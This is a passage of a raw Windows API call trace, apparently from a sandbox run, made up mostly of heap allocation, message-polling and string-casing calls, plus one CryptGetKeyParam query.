0x8df0c8 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0190.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.471] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.472] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.472] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.473] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0190.474] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0190.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.475] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0190.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0190.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.479] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.479] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 